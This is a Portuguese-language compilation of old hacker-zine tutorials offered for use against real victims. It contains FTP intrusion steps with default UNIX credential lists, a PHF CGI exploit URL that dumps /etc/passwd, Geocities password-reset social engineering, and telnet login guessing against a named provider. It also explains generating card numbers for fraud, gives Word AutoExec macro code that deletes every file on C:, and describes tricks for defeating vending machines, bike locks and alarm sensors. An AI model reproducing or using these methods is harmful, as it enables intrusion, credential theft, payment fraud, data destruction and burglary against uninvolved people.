Invasão de servidor de FTP ATAQUE POR FTP Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do Host ou seu IP, para isto use o IPSCAN ou outro programa qualquer de IP. Lista de Alguns FTP's: ftp.mandic.com.br ftp.bestway.com.br ftp.internetclub.com.br(HACKEADO) ftp.netscape.com ftp.angelfire.com Existem varios Programas de FTP'S, no Windows vem um programa de FTP. Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br. Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL: Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje Para entrar Invisivel: No login precione ENTER, no password precione ENTER novamente... Ira aparecer o prompt ftp> ai é só digitar: quote user ftp , precione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando invisivel... Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction aplly, vc não esta Hackeando, pois esta aplicada a proteção... para isto tente com outro USER tipo: quote cwd ~sys e os outros da lista UNIX (acima) ATENÇÃO!!!! Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção.... Ao entrar vc vai estar no diretório do login, tipo \home\root\ Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd), ele contém as senhas doas usuarios, estão todas criptografadas, mas existe prgramas com o Jack que conseguem descriptografar através do metodo de comparação, o Jack pega uma Worlist (arquivo palavras mais usadas como senha), criptografa ela com as instruções do passwd e compara, os resultados são gravados em um arquivo (acho, ele não roda no meu pc!). O arquivo de senhas podem estar em vários diretórios, dependendo do tipo de UNIX, olhe a lista abaixo: UNIX: Diretório: AIX 3 /etc/security/passwd /tcb/auth/files// A/UX 3.Os /tcb/files/auth/? BSD4.3-Reno /etc/master.passwd ConvexOS 10 /etc/shadpw Convex0S 11 /etc/shadow DG/UX /etc/tcb/aa/user EP/IX /etc/shadow HP-UX /.secure/etc/passwd IRIX 5 /etc/shadow Linux 1.1 /etc/shadow OSF/1 /etc/passwd[.dir|.pag] SCO Unix #.2.x /tcb/auth/files/ SunOS 4.1+c2 /etc/security/passwd.adjunct SunOS 5.0 /etc/shadow System V 4.0 /etc/shadow System V 4.2 /etc/security/database Ultrix 4 /etc/auth[.dir|.pag] UNICOS /etc/udb Bom... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear. Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e pode dá cadeia. Não me responsabilizo por atos cometidos nos servidores... o problema é de quem Hackeia, e não meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA.... -------------------------------------------------------------------------------- Como Hackerar a Geocities Entrei na pagina de varias pessoas e pensei pq ate hoje nao ouvi falar de alguem que tenha hackeado uma pagina dessa?? Se tem alguem realmen- te nao ouvi falar! Entao olhei por dentro a pagina do FILE MANAGER na Geocities e tentei descobrir alguma relacao entre a minha senha e a porrada de numeros e letras que aparecem ali; nao encontrei relacao nenhuma:) Mas aconselho a continuarem tentando, coisa q eu ainda to fazendo! E olhando a pagina de uma pessoa por dentro vi o counter da Geocities ali dentro com o membername(logico todas tem),e pensei na maneira mais ridicula de pegar a senha do cara. Eu nao esperava encontrar profissionais tao imbecis la, mas eles exis- tem sim. -.- DIRETO AO ASSUNTO -.- 1- Anote o membername da pagina dando um source! 2- Anote o lugar em que essa pagina esta. ex: http://www.geocities.com/Augusta/2000/ ^^^^^^^^^^^^ Logicamente vc so vai anotar o diretorio e o block! 3- Agora va ate a pagina principal da Geocities e clique no link CONTACT GEOCITIES do lado esquerdo, depois clique em SYSTEM PROBLEMS, e depois em SYSTEM PROBLEMS REPORTING FORM. La vc vai colocar as informacoes necessarias, o diretorio(acima citado) o block, o seu email(aconselho a fazer o forward) e no espaco abaixo vc vai colocar o problema, diga que ainda nao recebeu sua senha(em ingles) 4- Porra como e ridiculo ne? Agora e so esperar em 3 ou 4 dias no ma- ximo chega sua senha! Obx: E mais facil de receber a senha se a home page que vc for hackear for nova(no maximo 2 meses) se passar disso ja fica muito dificil de receber a resposta! Fique tranquilo eles sao muito atarefados pra verificarem se e vc mesmo, quase 100% de chance de receber o email e nao acontecer nada com vc! -------------------------------------------------------------------------------- Coca-Cola Gratis Primeiro vc compra uma ficha de coca-cola (soh funciona com ficha) Vc aperta um botao qualquer e mantem pressionado, dai vc fica apertando e desapertando um outro botao do refrigerante que vc quer, bem rapido em torno de 10 apertadas por segundo, agora vc coloca a ficha, com sorte vc vai receber mais uma lata, se tiver SORTE MESMO vc vai receber todas as latas do sabor que estava com o botao precionado, umas doze Funcionamento: Da um tilt na maquina que tem pouca memoria e começa a sair as latas, funciona muito bem nas maquinas que sao so de ficha... (mais antigas e com pouca memoria) -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Como descobrir senhas de trancas de Bikes Isso e muito simples e bastante eficaz: 1- Tem que ser uma tranca desse modelo (eu nunca testei com outro) _______ | _ | |_| | | ___|_| | | | 1 2 | | 3 4 | | 5 6 | | 7 8 | | 9 0 | |_____| | | ",,,,, 2- Pegue na parte onde tem os números e na que a outra parte que coloca a corrente e force para os lados como se quisesse abrir, quando estiver forcando, aperte todos os números com força, ate que todos se abaixem o máximo que possa conseguir... depois olhe os que estiverem mais altos, pois eles que são a senha... Muito Fácil !!!! Não? Caso testem em outros modelos e tiverem hesito, me informem -------------------------------------------------------------------------------- Ataque via Browser O ataque via browser é um dos ataques mais faceis de executar, mas não da nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo: Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda: Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados , existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear. Ex.: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá. -------------------------------------------------------------------------------- O que Sao JokeFiles ? Esses arquivos sempre fazem uma piadinha e simula a reiniciacao de seu pc ou a formatacao de seu HD e simula muitas outras coisas para iniciantes é muito animal .... o kra se caga todo!!Na secao de downloads tem alguns arquivos !!hehe-------------------------------------------------------------------------------- Como pegar senhas piratas Pegando senhas Existem vários meios de se obter senhas de acessos. Os mais comuns estão listados abaixo. Cavalo de Tróia O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador. Farejamento de redes Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados. Engenharia social É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker. Quebra-cabeça Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção. Invasão do servidor O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor. Dedução Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais: 1. Cerca de 1 em cada 30 usuários usa o login como senha. 2. Muitos administradores usam a senha padrão do sistema. 3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain). -------------------------------------------------------------------------------- Como fazer CC's validos (Piratas) Algoritmo para gerar números de cartões de crédito válidos Com certeza, toda a gente já ouviu falar nos geradores de números de cartões de crédito!!!Porem muita asneira é dita, acerca deste assunto. 1) Quando se efectua uma transacção na web, o site "vitima", não verifica, imediatamente, se o cartão tem crédito associado.(alem de que este tipo de informação e confidencial e apenas, instituições bancárias, teem acesso a este tipo de informação). 2)Um cartão pode ser válido, ou seja, o número ter sido gerado pelo algoritmo correcto, e num entanto, não estar atribuído, ou seja nenhuma entidade bancária, ou financeira o tenha atribuído a um utilizador. 3)O facto de um cartão não estar atribuído, ao contrário do que se diz, não inviabiliza uma compra...devido ao ponto 1). 4)Se um gerador, por ventura, gerar um numero atribuído... É PURA COINCIDÊNCIA!!! O sucesso, deste tipo, de falcatrua, é relativo...eu, pessoalmente, nunca tentaria comprar um Rolex, deste modo...porem,...quem resiste a dar uma espreitadela, no bem guardado e bem pago site da Playboy! Claro, que recomendo, ao que pensam em se aventurarem nestes domínios, a darem uma saltada em www.anonymizer.com . Ao que interessa: Um número válido de um Cartão de Crédito (CC), tem 16 algarismos, dos quais os quatro primeiros (chamado prefixo), indicam o código do banco emissor, e o primeiro destes quatro algarismos, indica a rede, onde este cartão é aceite: (um mesmo banco , pode ter mais do que um prefixo, por exemplo, o Totta Matic, é um serviço especial do Banco Totta e Açores, tem um prefixo (4775), diferente dos cartões usuais!). 3 -> American Express 4 -> Visa (a mais usada em Portugal) 5 -> MasterCard 6 -> Discover (esta rede não e usada em Portugal) Como se verifica então que um número é válido?: Por exemplo o cartão... 4938 0723 5791 0411 (rede: Visa ,Banco Pinto & Sotto Mayor). Se pegarmos nos algarismos que ocupam as posições impares no número do CC: 4 3 0 2 5 9 0 1 e apenas nestes, que ocupam posições impares. Agora a esses algarismos multiplica-se 2, se o resultado for maior que 9, dever-se-a subtrair nove a multiplicação...ficara então algo como: 8 6 0 4 1 9 0 2 ..isto então passará, juntando outra vez os algarismos que ocupam as posições pares, para: 8968 0743 1791 0421 agora se a soma de todos os algarismos deste novo número for um múltiplo de 10 e menor do que 150, o número inicial é válido... ex: 8+9+6+8+0+7+4+3+1+7+9+1+0+4+2+1=70, que por sua vez e um múltiplo de 10 e é menor do que 150!! Mas, o que nos interessa, e saber como gerar números validos de CC's...para isso e preciso saber muitos bem o algoritmo que testa a sua validade. Para gerar um número, basta apenas escolher o prefixo do banco (independentemente, se e Visa, ou qualquer outra rede): 4938 .... .... .... Sabemos então o prefixo, e queremos criar o resto...pois bem, é fácil: Geram-se aleatoriamente, mais 11 algarismos (E NÃO 12!!), e ficamos, por exemplo com o seguinte: 4938 1432 6745 362. Ou seja, o último algarismo permanece, por agora desconhecido... Tal como na função para testar, o processo e semelhante: nos algarismos que ocupam posições impares, multiplicam-se por 2, e os que com esta multiplicação ficarem maiores do que 9, subtrai-se 9 ao resultado, o resultado e este: 8 6 2 6 3 8 6 4. que juntando com os restantes algarismos: 8968 2462 3785 664. A soma total dos algarismos é: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84 Ora, para este numero ser valido, basta que o ultimo algarismo, que ainda não está atribuído seja 6, pois: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84+6=90 !!!! 90 e menor do que 150 e é múltiplo de 10. Ora cá temos um número gerado, válido!!!!!!!!!!!!!!!!! Para extrapolar números, a partir de porções de outros números, o processo e exactamente o mesmo. Por exemplo, queremos extrapolar números a partir da seguinte porção de um outro número: 4938 452. .... .... Geram-se aleatoriamente os restantes números, excepto o ultimo, e pratica-se a já conhecida regra!!!!!!!! Como podem ver, fazer um gerador de números de CC's e simples, apenas requer prática de algoritmia. Já agora ficam aqui também alguns prefixos de bancos portugueses, não inclui bancos estrangeiros, pois qualquer gerador, possui uma lista destes!!! 4775 - Banco Totta & Acores (TottaMatic) 4943 - Banco Mello 4552 - Banco Comercio e Industria 5901 - Banco Atlantico 4154 - Nova Rede 4547 - Banco Fonsecas e Burnay 5906 - Banco Borges Irmao 5016 - Banco Nacional Ultramarino 4407 - Banco Espirito Santo 4938 - Banco Pinto & Sotto Mayor 4552 - Banco Internacional de Credito 4644 - Caixa Geral de Depositos -------------------------------------------------------------------------------- Fazendo Virus de Macro Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto. Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens com usuarios pentelhos. ps: Software/versao Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95) O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado. Niveis de sacanagem Nivel 1..... Apenas uma brincadeira Nivel 2..... Apenas uma brincadeira de mau gosto Nivel 3..... não é mais brincadeira. Primeiro voce precisa criar uma macro... siga os passos: Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo. ps: existe outras formas/meios d criar uma macro,mas esta é mais simples. Nivel 1 O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do que ninguem. Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo. Sub MAIN vMsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub Nivel 2 É para deixar o usuario irritadissimo. no corpo da macro cole este texto abaixo: Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub Nivel 3 Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe. Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WINWORD\*.*" End Sub Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,entao se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'. Detalhes: Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas não irei falar, descubra voce mesmo. A macro do word é uma ferramenta riquissima, procure fucar. Voce pode fazer estas no seu proprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para não explodir em voce. não me responsabilizo por qualquer ato. -------------------------------------------------------------------------------- Violando Alermes INTRODUCAO Todo sistema de alarme necessita de uma central de processamento de sinais, um sistema de aviso para fazer algum tipo de operacao qd a area eh violado ih alguns sensores para fazer a integracao da area violada com a central de pro- cessamento. Componentes basicos para um sistema convencional de alarmes: SENSORES CIRCUITO CENTRAL FONTE / BATERIA SISTEMA DE DESARME DE CONTROLE CARREGADOR, ETC DE AVISO SENSORES MAGNETICOS Os sensores magneticos consistem num interruptor de laminas e um ima, monta- dos em pecas separadas. Muito usados em portas e/ou janelas. Numa instalacao, o interruptor(red-switch) eh q tem ligacao eletrica com o sistema de alarme atraves de fios, e eh posicionado na parte fixa do objeto ih o ima eh fi- xado na parte movel do objeto. Quando o objeto estah fechado o ima mantem as laminas do interruptor da parte fixa escostadas uma na outra de modo que o alarme fique desarmado. Se o ima for afastado do interruptor de laminas, qd a janela ou porta for aberta, as laminas do interruptor abrem disparando o circuito. Entao vem aquela pergunta: Como Violar ? Aguenta q aki vai filhote. No estado normal do objeto(fechado), as laminas do interruptor sao mantidas encostadas pelo ima(fixado na parte movel do objeto) do sistema. Qualquer ima (beim potente) externo mantera os contatos fechados, mesmo que o ima original seja removido(abrindo o objeto). Assim o intruso tera q localizar a posicao do sensor antes de tentar uma invacao ih assim podera neutralizar. Olhando pelo lado de fora de uma janela ele podera localizar o sensor ih terah que manter o seu ima nas proximidades. O alarme nao ira disparar mesmo q o ima da janela seja afastado. Um outro esquema parecido com esse eh o sistema de alarme para carro(aquele q usa um chaveirinho para ativar/desativar). Neste caso o sensor eh acionado pelo ima carregado num chaveiro de modo a armar e desarmar o alarme. Dae nao eh mais necessario eu falar oq vc teim q fazer neh filhote. SENSORES OPTICOS O alarme de interrupcao eh o tipo mais comum de alarmes q fax uso de sensores opticos. Este alarme eh formado por uma fonte de luz ih um sensor que devem ser posicionados de tal forma que alguem que penetre no local protegido in- terrompa o feixe de luz. Bom dependendo do tipo da fonte de luz o sistema podera ser violado (ou melhor, podera ser enganado). Com a descoberta do sensor(emissor de luz) o intruso podera inibir o sistema simplesmente focalizando uma lanterna. Mas essa forma de enganar o alarme somente se aplica aos emissores de luz branca, pois o tipo de luz (luz reta) que eh emitido pela lanterna eh igual ao do emissor de luz do sistema.